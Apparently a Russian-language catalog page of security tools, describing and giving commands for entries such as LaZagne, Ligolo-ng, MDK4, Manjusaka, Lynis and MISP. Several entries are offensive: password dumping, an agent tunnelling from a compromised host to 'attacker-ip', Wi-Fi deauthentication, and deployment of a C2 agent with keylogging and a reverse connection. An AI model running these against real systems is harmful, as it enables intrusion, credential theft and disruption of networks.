Каталог инструментов

325 инструментов

LaZagne

v2.4.7
Post-Exploitation

Кросс-платформенный инструмент для извлечения сохранённых паролей из десятков приложений: браузеры, почтовые клиенты, SSH-клиенты, мессенджеры, БД, VPN, git и др. Работает на Windows, Linux и macOS. Применяется в пентесте …

# Python: git clone https://github.com/AlessandroZ/LaZagne cd LaZagne pip install -r requirements.txt python laZagne.py all # Windows-бинарь: # https://github.com/AlessandroZ/LaZagne/releases laZagne.exe all laZagne.exe browsers laZagne.exe wifi

Ligolo-ng

v0.8.3
Exploitation ★ featured

Продвинутый инструмент для туннелирования и пивотинга в сети с использованием TUN-интерфейса. Позволяет прозрачно направлять трафик через скомпрометированные хосты без socks-proxy. Возможности: - Прозрачный туннель через TUN-интерфейс (не SOCKS) …

# Скачать релизы (proxy + agent): # https://github.com/nicocha30/ligolo-ng/releases # На хосте атакующего (proxy): sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ./proxy -selfcert -laddr 0.0.0.0:11601 # На скомпрометированной машине (agent): ./agent -connect attacker-ip:11601 -ignore-cert # В консоли proxy: session # выбрать агента ifconfig # посмотреть сети агента start # запустить туннель # Добавить маршрут к внутренней сети: sudo ip route add 192.168.1.0/24 dev ligolo

Lokinet

v0.9.14
Anonymizers

Децентрализованная анонимная сеть уровня 3 (IP-уровень), основанная на протоколе LLARP. Позволяет запускать любое сетевое приложение (браузер, мессенджер) анонимно через сеть .loki. Создает виртуальный IP-адрес в сети LokiNet. Часто …

Lynis

v3.1.7
Defensive & Threat Intelligence

Инструмент для аудита безопасности систем (security auditing). Проверка конфигураций, правил файрвола, SSH, SSL, базы данных, веб-серверов. Генерирует отчёты с рекомендациями по hardening. Используется для compliance.

# Debian/Ubuntu: sudo apt install lynis # Или из репозитория: git clone https://github.com/CISOfy/lynis cd lynis sudo ./lynis audit system # Аудит: lynis audit system --quick lynis audit system --forensics

MAT2

v0.13.4
Anonymizers

Metadata Anonymisation Toolkit v2 — удаляет метаданные из файлов перед их публикацией или передачей. Поддерживает PDF, DOCX, XLSX, PPTX, JPEG, PNG, MP3, MP4, ZIP, и десятки других форматов. …

apt install mat2 # или pip install mat2 # Показать метаданные mat2 --show document.pdf # Удалить метаданные (создаёт document.cleaned.pdf) mat2 document.pdf # Несколько файлов mat2 *.jpg *.pdf

MDK4

v4.2
Wireless & RF

Инструмент для беспроводного DoS и тестирования устойчивости сетей: Beacon Flood (спам фиктивными AP), Deauth/Disassociation атаки, Michael Shutdown (атака на TKIP), WPA Downgrade. Наследник mdk3 с поддержкой 802.11n/ac.

sudo apt install mdk4 # или: git clone https://github.com/aircrack-ng/mdk4 cd mdk4 && make && sudo make install # Deauth всех клиентов: sudo mdk4 wlan0mon d -c 6 # Beacon flood: sudo mdk4 wlan0mon b

MISP

v2.5.44
Defensive & Threat Intelligence

Платформа для сбора, хранения и обмена данными об угрозах (threat intelligence). Поддерживает форматы STIX/TAXII, автоматическую корреляцию IOC, интеграцию с IDS/IPS, SIEM и другими инструментами. ИспользуетсяCERT-ами и SOC-командами по …

# Docker (рекомендуется): git clone https://github.com/MISP/MISP cd MISP docker-compose up -d # Или Ubuntu: wget -O /tmp/INSTALL.sh https://raw.githubusercontent.com/MISP/MISP/2.4/INSTALL/INSTALL.sh sudo bash /tmp/INSTALL.sh # Доступ: # https://localhost # Логин: admin@admin.test / admin

Maigret

v0.6.2
Reconnaissance

OSINT-инструмент для поиска аккаунтов по username в 3000+ сайтах. Форк и эволюция Sherlock: помимо поиска собирает дополнительные данные из профилей — ссылки, теги, ID, местоположение. Строит связи между …

pip3 install maigret # Или из исходников: git clone https://github.com/soxoj/maigret cd maigret pip3 install -r requirements.txt maigret username maigret username --pdf maigret username --top-sites 500

Malcolm

v26.06.1
Network Analysis

Платформа анализа сетевого трафика от CISA/INL на Docker: принимает PCAP и логи Zeek/Suricata, визуализирует через OpenSearch Dashboards и Arkime; полноценная альтернатива Security Onion для SOC.

# Требования: Docker + Docker Compose, минимум 16 ГБ RAM git clone https://github.com/cisagov/Malcolm cd Malcolm # Интерактивная установка и настройка python3 scripts/install.py # Запуск docker compose up -d # Malcolm откроется на https://localhost/ # Логин/пароль задаётся при установке # Загрузка pcap для анализа curl -u admin:password -F 'filesize=@capture.pcap' https://localhost/upload

Maltego

Reconnaissance

Визуальная платформа разведки и анализа связей (link analysis). Строит граф из людей, компаний, доменов, IP, соцсетей и их взаимосвязей. Использует transforms для автоматического сбора данных из Shodan, VirusTotal, …

# Скачать бесплатную версию Community Edition: # https://www.maltego.com/downloads/ # Требуется JRE 11+ # После установки: зарегистрировать аккаунт на maltego.com # Kali Linux: sudo apt install maltego maltego

Manjusaka

Post-Exploitation

C2-фреймворк на Rust (агент) и Go (сервер) с веб-панелью управления: сбор системной информации, скриншоты, кейлоггинг, работа с файлами, выполнение команд, извлечение сохранённых паролей браузеров. Получил известность в 2022 …

# Требования: Rust 1.85+, Cargo, Protocol Buffers compiler, OpenSSL dev headers git clone https://git.toolsofthetrade.qzz.io/recovered/manjusaka.git cd manjusaka cargo build --workspace --release # Запуск сервера управления (nps) ./target/release/nps # Веб-панель: https://localhost:33000/manjusaka/static # Дальше в панели: добавить листенер (внешний IP) -> создать проект (callback = внешний IP, # слушатель — только что созданный) -> сгенерировать агент npc1 -> запустить на цели -> # после коннекта агент подгружает расширенный npc2 и открывает обратное соединение.

Manticore

v0.3.7
Blockchain / Web3

Фреймворк символьного выполнения для EVM и нативных бинарей (x86/64, ARM) от Trail of Bits. Для Ethereum: исследует все пути выполнения, генерирует PoC-транзакции для найденных уязвимостей. Для нативных бинарей: …

pip install manticore[native] # EVM manticore contract.sol # Нативный бинарь manticore ./vulnerable_binary